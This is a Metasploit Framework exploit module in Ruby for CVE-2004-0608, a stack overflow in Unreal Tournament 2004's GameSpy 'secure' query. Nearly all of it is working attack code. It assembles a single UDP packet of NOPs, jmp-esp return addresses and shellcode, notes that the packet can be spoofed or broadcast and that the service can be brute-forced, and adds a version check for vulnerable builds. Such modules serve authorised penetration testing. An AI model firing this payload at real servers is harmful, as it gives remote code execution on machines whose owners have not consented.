GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/games/ut2004_secure.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
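class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  # Server builds reported via "\gamever\" that this module treats as
  # affected by CVE-2004-0608; a 2xxx build is reported as UT2003 instead.
  VULNERABLE_BUILDS = %w[3120 3186 3204].freeze

  # Module metadata (name, references, payload constraints, target) plus the
  # single RPORT option; 7787 is the usual GameSpy query port per the description.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Unreal Tournament 2004 "secure" Overflow (Win32)',
        'Description' => %q{
          This is an exploit for the GameSpy secure query in
          the Unreal Engine.

          This exploit only requires one UDP packet, which can
          be both spoofed and sent to a broadcast address.
          Usually, the GameSpy query server listens on port 7787,
          but you can manually specify the port as well.

          The RunServer.sh script will automatically restart the
          server upon a crash, giving us the ability to
          bruteforce the service and exploit it multiple
          times.
        },
        'Author' => [ 'stinko' ],
        'License' => BSD_LICENSE,
        'References' => [
          [ 'CVE', '2004-0608'],
          [ 'OSVDB', '7217'],
          [ 'BID', '10570'],
        ],
        'Privileged' => true,
        'Payload' => {
          'Space' => 512,
          'BadChars' => "\x5c\x00",
        },
        'Platform' => 'win',
        'Targets' => [
          ['UT2004 Build 3186', { 'Rets' => [ 0x10184be3, 0x7ffdf0e4 ] }], # jmp esp
        ],
        'DisclosureDate' => '2004-06-18',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(7787)
      ]
    )
  end

  # Sends the single "\secure\" query datagram and then runs the handler.
  #
  # The buffer is assembled with overlapping writes whose order matters:
  # the first target ret fills bytes 0..59, the second ret overwrites bytes
  # 54..57, the query keyword overwrites bytes 0..7, and the encoded payload
  # occupies the tail of the 1024-byte NOP buffer. The socket is always
  # released, even if the handler raises.
  def exploit
    connect_udp
    begin
      # payload.encoded is read once so the length and the bytes written agree.
      shellcode = payload.encoded

      buf = make_nops(1024)
      buf[0, 60] = [target['Rets'][0]].pack('V') * 15
      buf[54, 4] = [target['Rets'][1]].pack('V')
      buf[0, 8] = "\\secure\\"
      buf[buf.length - shellcode.length, shellcode.length] = shellcode

      udp_sock.put(buf)

      handler
    ensure
      disconnect_udp
    end
  end

  # Probes the server with a GameSpy "\basic\" query and extracts the version
  # it reports.
  #
  # @return [String, nil] the digits following "\gamever\" in the reply, or
  #   nil when no reply (or no version field) was received
  def ut_version
    connect_udp
    begin
      udp_sock.put("\\basic\\")
      res = udp_sock.recvfrom(8192)
    ensure
      disconnect_udp
    end

    # Rex's UDP recvfrom returns [data, host, port]; matching has to run on the
    # data element, not the array. Array() also tolerates a bare String and
    # nil, so an empty/timeout reply simply yields no match.
    match = Array(res).first.to_s.match(/\\gamever\\([0-9]{1,5})/)
    match && match[1]
  end

  # Version-based vulnerability check.
  #
  # @return [Exploit::CheckCode] Appears for a build in VULNERABLE_BUILDS,
  #   Detected for a 2xxx (UT2003) build, Safe for any other reported build,
  #   and Unknown when the server could not be fingerprinted at all
  def check
    vers = ut_version

    unless vers
      print_status("Could not detect Unreal Tournament Server")
      # A missing fingerprint is not evidence of safety; report Unknown
      # rather than returning nil, which is not a valid CheckCode.
      return Exploit::CheckCode::Unknown
    end

    vprint_status("Detected Unreal Tournament Server Version: #{vers}")

    # vers is digits only (see ut_version), so whole-string comparison is
    # equivalent to the anchored regex this replaces.
    if VULNERABLE_BUILDS.include?(vers)
      vprint_status("This system appears to be exploitable")
      return Exploit::CheckCode::Appears
    end

    if vers.match?(/\A2[0-9]{3}\z/)
      vprint_status("This system appears to be running UT2003")
      return Exploit::CheckCode::Detected
    end

    vprint_status("This system appears to be patched")
    Exploit::CheckCode::Safe
  end
end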